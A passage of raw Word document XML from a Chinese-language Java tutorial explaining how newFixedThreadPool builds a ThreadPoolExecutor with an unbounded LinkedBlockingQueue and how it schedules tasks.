          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>corePoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35FD3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35FD3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>maximumPoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35FD3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的大小是一样的（如果使用无界</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35FD3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35FD3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的话</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35FD3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>maximumPoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35FD3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>参数是没有意义的）最后的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35FD3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35FD3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>选择了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35FD3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LinkedBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35FD3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，该</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35FD3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35FD3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>有一个特点，他是无界的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="108AC6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="135255"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="232" name="图片 3" descr="收藏代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId22" tooltip="&quot;收藏这段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收藏代码">
                      <a:hlinkClick r:id="rId22" tooltip="&quot;收藏这段代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="135255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> ExecutorService newFixedThreadPool(</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> nThreads) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> ThreadPoolExecutor(nThreads, nThreads,  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>                                      0L, TimeUnit.MILLISECONDS,  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>                                      </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> LinkedBlockingQueue&lt;Runnable&gt;());  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>    }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRDefault="008632FA" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35FD3" w:rsidRDefault="0068549A" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>a)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如果当前线程数小于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>corePoolSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，则创建新进程来执行任务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068549A" w:rsidRDefault="0068549A" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>b)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在线程池完成预热之后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>当前运行的线程数等于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>corePoolSize)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，将任务加入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LinkedBlockingQueue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068549A" w:rsidRDefault="0068549A" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>c)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>线程执行完</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>a)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中的任务之后，循环从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LinkedBlockingQueue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>队列中获取任务来执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068549A" w:rsidRPr="00951658" w:rsidRDefault="00D978DF" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
